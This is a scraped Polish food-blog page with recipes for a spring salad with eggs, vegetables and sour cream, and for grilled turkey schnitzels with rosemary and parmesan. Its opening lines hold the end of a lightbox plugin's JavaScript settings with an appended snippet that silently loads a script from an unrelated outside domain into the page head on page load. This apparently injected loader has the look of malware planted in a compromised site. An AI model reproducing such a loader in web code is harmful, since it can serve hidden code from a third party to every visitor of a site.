, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

pozostałości… pozowały przed obiektywem

dumnie :) Zapraszam na indyka z rozmarynem i parmezanem oraz naszę domową klasykę: wiosenną sałatkę – w środku lata.

Sałatka wiosenna:

  • 4 jajka ugotowane na twardo
  • 4 pomidory
  • 4 ogórki gruntowe
  • pęczek rzodkiewki
  • szczypiorek
  • koperek
  • śmietana ~ około 200ml
  • sól, pieprz
Obrane ogórki, pomidory i rzodkiewkę pokroić w kostkę, dodać pokrojony szczypiorek i posiekany koperek. Doprawić solą, pieprzem i wymieszać ze śmetaną.
Sznycle z piersi indyka grillowane 
  • pierś indyka pokrojona na sznycle
  • tarty parmezan
  • świeży rozmaryn
  • olej z rzepaku canola i owoców czerwonej palmy (można zastąpić dowolnym innym)
  • czosnek granulowany
  • sól, pieprz
Sznycle posmarować lekko olejem, oprószyć przyprawami, rozmarynem i tartym parmezanem. Układać jeden na drugim, pozostawić w temperaturze pokojowej około godziny. Ważne by nie chłodzić w lodówce przed grillowaniem! Dzięki temu mięso będzie miękkie, soczyste. Użyłam patelni grillowej.
Szybko i łatwo – tylko przy wiosennej trzeba się nieco nakroić :)
Smacznego!

Kategoria: Bez kategorii Komentarz »


Skomentuj...



Początek strony